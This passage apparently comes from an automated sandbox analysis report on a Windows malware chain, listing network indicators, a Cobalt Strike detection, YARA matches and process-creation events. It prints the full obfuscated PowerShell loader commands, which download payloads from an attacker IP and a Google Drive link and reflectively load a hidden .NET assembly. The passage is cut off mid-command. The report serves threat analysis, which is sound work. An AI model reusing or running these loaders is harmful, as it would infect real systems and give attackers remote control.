        Source: powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: powershell.exe, 00000007.00000002.2021283699.0000000003127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
        Source: powershell.exe, 0000000B.00000002.1986762830.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
        Source: powershell.exe, 0000000B.00000002.1988384568.000000000491C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: powershell.exe, 0000000B.00000002.1988384568.000000000491C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000001.00000002.1985218848.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000001.00000002.2016437348.0000000008420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000001.00000002.1998227914.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1866713912.00000000061AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49731 version: TLS 1.2

        System Summary

        barindex
        Detected Cobalt Strike Beacon
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExEJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHl